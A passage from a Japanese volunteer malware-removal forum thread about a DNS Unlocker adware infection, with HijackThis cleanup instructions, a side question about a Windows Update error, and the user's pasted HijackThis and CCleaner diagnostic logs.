これを実行することで作業時にスキャンで検出される無駄なゴミファイルも減るのでその分かなり時間や解析も楽になるのです。
「ごみ箱」など他の項目にチェックしないのは、間違って正常なファイルを削除しないためと、もし正常なファイルを削除してごみ箱に入れても戻せるようにするための措置です。

HJTを起動させ、スキャンを行ってください。
スキャン結果が表示されましたら、以下の項目にチェックを入れてください。
ただし、特にHJTでの作業は一歩間違えれば簡単にPCが起動しなくなるため、こちらが指示した以外のものは絶対にチェックを入れないでください。
O2 - BHO: DOwnnSave - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.dll (file missing)

O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe

O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe

O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Riverbed Technology, Inc. - C:\Program Files (x86)\WinPcap\rpcapd.exe

必要な項目すべてにチェックが入りましたら、Fix checkedをクリックしてください。
探しても見つからないものはスルーして進めていいです。

ここでPCを通常モードで再起動してから、今度はCCを起動してください。
起動したら、「ツール」→」「スタートアップ」→「Windows」タブを開いてください。
そこで右下の「テキストとして保存」を押すと、表示の内容がログとして保存できるので、ログをデスクトップにでも保存しておいてください。

続いて「InternetExplorer」タブ以下の各タブも順番に開いて、そのログもとっておいてください。

CCの各ログをとったらCCは終了してください。

このあとブラウザを起動して、数時間ほどPC状態を様子見したあと、あらたにHJTとCCでのインストール情報ログを取り直してください。

取り直した両ログと、CCの各ログを返信に貼って、状態報告とともにレスください。
それらを見てから続きの作業を指示します。
  • 悪代官
  • 2015/09/07 (Mon) 06:18:41
返信フォームへ 
Re: DNSunlockerの感染
ここで質問すべき内容ではないのかもしれませんが、windows updateを行おうとすると
「エラーコード:8024002E」と出て新しい更新プログラムを検索できませんでしたと表示され、アップデートできないのですがこれもウイルス等の影響なのでしょうか?

エラーコードを調べたのですが明快な解決方法が見つからなく困っています。

補足ですが、windows updateに関しては通知がうるさいと感じたので手動にしていたのですがいつの間にかこうなっていました。


※追記1 話が抜けていました、レジストリを少し弄っていたので再起動したら少しだけ作業が進みました。引き続き作業を続けていきたいと思います。
  • あすとろ
  • 2015/09/07 (Mon) 15:12:41
返信フォームへ 
リカバリも視野に入れておいてください
レスが遅くなってごめんなさい。
今日は相談者さんがいつもより激増しているため、各スレへの説明と指示をある程度簡略化で進めます。
できるだけ多くの方にレスするためなので、ご了承ください。

>windows updateを行おうとすると
>「エラーコード:8024002E」と出て新しい更新プログラムを検索できませんでしたと表示され、アップデートできないのですがこれもウイルス等の影響なのでしょうか?

普通に考えてもWUが正常にできないのはかなり危険な状態です。
感染がなく単純にPCのシステムエラーとしても、それはPCの内部がかなり不安定になっているはずなので、あまりそれが続くならリカバリするのが安全で確実です。
必要なデータ等のバックアップを早めにとっておいてください。

では先の指示に沿って進めたあとの各ログをレスで見せてもらえますか。
まずはできるところからでも調べていきましょう
  • 悪代官
  • 2015/09/07 (Mon) 20:44:00
返信フォームへ 
Re: DNSunlockerの感染
こちらこそレスが遅くなってしまい申し訳ございません。

>今日は相談者さんがいつもより激増しているため、各スレへの説明と指示をある程度簡略化で進めます。
できるだけ多くの方にレスするためなので、ご了承ください。

ご多忙の中、対応していただいて感謝です。


本題に入りますがwindows updateはとりあえず後回しにして(それ以外の指定されたソフトの更新、アンインストールは完了しました)作業を行うことにしました。

状況報告になりますが、少しだけですがブラウザを使ってみたところ症状は未だ収まっていない状態です。

以下にログを貼ります。


HJT------------------------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 0:46:38, on 2015/09/08
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 37.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 11938 bytes


cc chorome----------------

有効 App Gmail 8.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 6.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0
有効 App YouTube 4.2.7 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0
有効 Extension Adblock Plus 1.9 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9_0
有効 Extension Chrome リモート デスクトップ 42.0.2311.37 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp\42.0.2311.37_0
有効 Extension FireShot - ウェブページのスクリーンショットをキャプチャ 0.98.68 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.68_0
有効 Extension Gestures for Google Chrome™ 1.13.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0
有効 Extension HGPlugin 1.1.0.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\omgpfjbejkpcnpadohokpjllldkejfpp\1.1.0.1_0
有効 Extension グランブルーファンタジー[ChromeApps版] 1.2.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.1_0
有効 Plugin Adobe Acrobat 10.1.13.16 最初のユーザー C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
有効 Plugin AhnLab Online Security 2, 0, 0, 85 最初のユーザー C:\Program Files (x86)\AhnLab\ASP\Components\aosmgr\conflict_507\npaosmgr.dll
有効 Plugin AhnLab Online Security Anti-keylogger 2, 5, 0, 73 最初のユーザー C:\Program Files (x86)\AhnLab\ASP\MyKeyDefense 2.5\npmkd25sp.dll
有効 Plugin Battlelog Game Launcher 2.4.0 最初のユーザー C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
有効 Plugin Battlelog Game Launcher 2.6.2 最初のユーザー C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll
有効 Plugin Chrome PDF Viewer 最初のユーザー C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\pdf.dll
有効 Plugin Chrome Remote Desktop Viewer 最初のユーザー internal-remoting-viewer
有効 Plugin Google Update 1.3.26.9 最初のユーザー C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 最初のユーザー C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin iTunes Application Detector 1.0.1.1 最初のユーザー C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin Java Deployment Toolkit 8.0.310.13 11.31.2.13 最初のユーザー C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll
有効 Plugin Java(TM) Platform SE 8 U31 11.31.2.13 最初のユーザー C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll
有効 Plugin Native Client 最初のユーザー C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\internal-nacl-plugin
無効 Plugin Nexon Game Controller 1, 0, 1, 4 最初のユーザー C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
無効 Plugin Pando Web Plugin 2.3.3.8 最初のユーザー C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll
有効 Plugin Shockwave Flash 16,0,0,305 最初のユーザー C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll
有効 Plugin Shockwave Flash 16.0.0.305 最初のユーザー C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\PepperFlash\pepflashplayer.dll
有効 Plugin Silverlight Plug-In 5.1.30514.0 最初のユーザー c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll
無効 Plugin Unity Player 4.3.7.98772 最初のユーザー C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
有効 Plugin Widevine Content Decryption Module 1.4.6.758 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.6.758\_platform_specific\win_x86\widevinecdmadapter.dll
有効 Plugin Windows Live™ Photo Gallery 15.4.3538.0513_ship.wlx.w4m4 (ship) 最初のユーザー C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll


cc firefox---------------------------

有効 Plugin Adobe Acrobat 10.1.15.11 Adobe Systems Inc. default Firefox 37.0.1 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
有効 Plugin Battlelog Game Launcher 2.4.0.0 EA Digital Illusions CE AB default Firefox 37.0.1 C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
有効 Plugin Battlelog Game Launcher 2.6.2.0 EA Digital Illusions CE AB default Firefox 37.0.1 C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll
有効 Plugin Google Update 1.3.28.13 Google Inc. default Firefox 37.0.1 C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 37.0.1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 37.0.1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
有効 Plugin iTunes Application Detector 1.0.1.1 Apple Inc. default Firefox 37.0.1 C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin Java Deployment Toolkit 8.0.600.27 11.60.2.27 Oracle Corporation default Firefox 37.0.1 C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 8 U60 11.60.2.27 Oracle Corporation default Firefox 37.0.1 C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll
有効 Plugin Nexon Game Controller 1.0.1.4 Nexon default Firefox 37.0.1 C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin OpenH264 Video Codec 1.3 default Firefox 37.0.1 C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\i4n38c5y.default\gmp-gmpopenh264\1.3\gmpopenh264.dll
有効 Plugin Shockwave Flash 18.0.0.232 Adobe Systems Incorporated default Firefox 37.0.1 C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
有効 Plugin Silverlight Plug-In 5.1.40416.0 Microsoft Corporation default Firefox 37.0.1 c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll
有効 Plugin Unity Player 4.3.7.33236 Unity Technologies ApS default Firefox 37.0.1 C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3538.513 Microsoft Corporation default Firefox 37.0.1 C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll


cc IE---------------------------
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Helper DOwnnSave C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll
有効 Helper Java(tm) Plug-In 2 SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
有効 Helper Java(tm) Plug-In SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll


cc windows---------------------------

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run Dropbox Update Dropbox, Inc. "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
無効 HKLM:Run Adobe ARM Adobe Systems Incorporated "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
有効 HKLM:Run BackupManagerTray NTI Corporation "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
有効 HKLM:Run ETDCtrl ELAN Microelectronics Corp. %ProgramFiles%\Elantech\ETDCtrl.exe
有効 HKLM:Run Google Japanese Input Prelauncher Google Inc. "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
有効 HKLM:Run HotKeysCmds Intel Corporation C:\Windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\Windows\system32\igfxtray.exe
有効 HKLM:Run IntelTBRunOnce Microsoft Corporation wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
有効 HKLM:Run iTunesHelper Apple Inc. "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
有効 HKLM:Run Launch LCore Logitech Inc. C:\Program Files\Logicool Gaming Software\LCore.exe /minimized
有効 HKLM:Run LManager Dritek System Inc. C:\Program Files (x86)\Launch Manager\LManager.exe
有効 HKLM:Run Logitech Download Assistant Microsoft Corporation C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
無効 HKLM:Run LogMeIn Hamachi Ui LogMeIn Inc. "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
無効 HKLM:Run mcui_exe "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
有効 HKLM:Run MSC Microsoft Corporation "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
無効 HKLM:Run Norton Online Backup Symantec Corporation C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
有効 HKLM:Run Persistence Intel Corporation C:\Windows\system32\igfxpers.exe
無効 HKLM:Run RTHDVCPL Realtek Semiconductor C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
有効 HKLM:Run SuiteTray Egis Technology Inc. "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
有効 HKLM:Run SunJavaUpdateSched Oracle Corporation "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
有効 Startup User Dropbox.lnk Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe


cc スケジュールされたタスク ----------------------------

有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task ASP "C:\Program Files (x86)\RCP\systweakasp.exe" /verysilent
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task DNSKINGSTON C:\Program Files (x86)\DNS Unlocker\dnskingston.exe /Scheduled
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /c
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
